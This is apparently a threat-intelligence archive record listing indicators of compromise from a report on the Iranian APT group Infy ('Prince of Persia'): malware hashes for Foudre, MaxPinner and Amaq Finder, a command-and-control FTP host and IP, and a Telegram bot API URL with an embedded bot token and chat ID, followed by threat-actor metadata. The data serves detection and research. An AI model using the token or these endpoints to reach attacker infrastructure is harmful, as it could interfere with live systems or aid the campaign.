Chat\r\nhttps://api.telegram.org/bot7900216285:AAEVjLjt4csUKGanerJuuiDhdsmlUv0yooM/getChatMember?\r\nuser_id=874675833\u0026chat_id=874675833\r\nMaxPinner v5 \r\nTel jam 
shid.exe – uploaded on 13/6/21 to VirusTotal – creation probably 16/8/18\r\n34692cabe9e9ba584ec2b8947a7aad4f787d10a3da56886e52d05d0675fe7b01\r\nFixed FTP server – ttdl3.dynu.net was probably resolved to 178.33.49.126\r\nMaxPinner v8  \r\n5AD83F9FAD87273593F9DF73761DE211A704E6E10984FDE113A6435CC83C1E58\r\nSFX – 04844b5e15750467224c29b6fe5806e4093cd1d0ee4904dccf96831947574c85\r\nAmaq Finder\r\nB9741ad9ac084fb43804618acabe637f6b097bf72264b3335514678b2d0da785 – Amaq Finder Version 1.0 – 2017-07-19\r\nA107635083212c662dbb3b69951e0de7b3d3894d8bcd7cfff545d119f81aeb1f – AmaqFinder1.rar\r\nAmaq Finder v1.7\r\n23761caf7f4c6d7b3b4608c59729eb807c961deaa23aac94db5289b9b9739864\r\n09a2f03b5d54b48ba5f0df9ea57a6c20ba6fa90ad0f334132ea1da9320fbfbfd\r\na8565b678857129158904760ffe468e3ea6e4cf8a63a6c16b97e5717b1e8a384\r\namfkey01.key\r\nDE94830B9B4DF6867B7D2888ACCA9F3D0C103933B01721C04E6BD6492BDE9E58\r\nDeep Freeze Version\r\n55d60bcf83c81fff25ca413dc2f720a671f522d79cc13b6d618f7f25094acd62\r\nB1a16dd0500c570fb44cd13b68737fcd18710072559f810f3b3691ca93787cff\r\nFoudre v34 checks Internet connectivity and gets current date:\r\nhttp://worldtimeapi.org/api/timezone/GMT\r\nAmaq Finder checks Internet connectivity and gets current date: http://www.cnbc.com/id/100727362/device/rss\r\nSource: https://www.safebreach.com/blog/prince-of-persia-a-decade-of-an-iranian-nation-state-apt-campaign-activity/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.safebreach.com/blog/prince-of-persia-a-decade-of-an-iranian-nation-state-apt-campaign-activity/"
	],
	"report_names": [
		"prince-of-persia-a-decade-of-an-iranian-nation-state-apt-campaign-activity"
	],
	"threat_actors": [
		{
			"id": "f763fd1f-f697-40eb-a082-df6fd3d13cb1",
			"created_at": "2023-01-06T13:46:38.561288Z",
			"updated_at": "2026-04-10T02:00:03.024326Z",
			"deleted_at": null,
			"main_name": "Infy",
			"aliases": [
				"Operation Mermaid",
				"Prince of Persia",
				"Foudre"
			],
			"source_name": "MISPGALAXY:Infy",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "59c9f31b-e032-44b9-bf3b-4f2cb3d17e39",
			"created_at": "2022-10-25T16:07:23.734244Z",
			"updated_at": "2026-04-10T02:00:04.731031Z",
			"deleted_at": null,
			"main_name": "Infy",
			"aliases": [
				"APT-C-07",
				"Infy",
				"Operation Mermaid",
				"Prince of Persia"
			],
			"source_name": "ETDA:Infy",
			"tools": [
				"Foudre",
				"Infy",
				"Tonnerre"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434247,
	"ts_updated_at": 1775792182,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9e35d4e7e7c92176ebc097c36b77e326ebece9eb.pdf",
		"text": "https://archive.orkl.eu/9e35d4e7e7c92176ebc097c36b77e326ebece9eb.txt",
		"img": "https://archive.orkl.eu/9e35d4e7e7c92176ebc097c36b77e326ebece9eb.jpg"
	}
}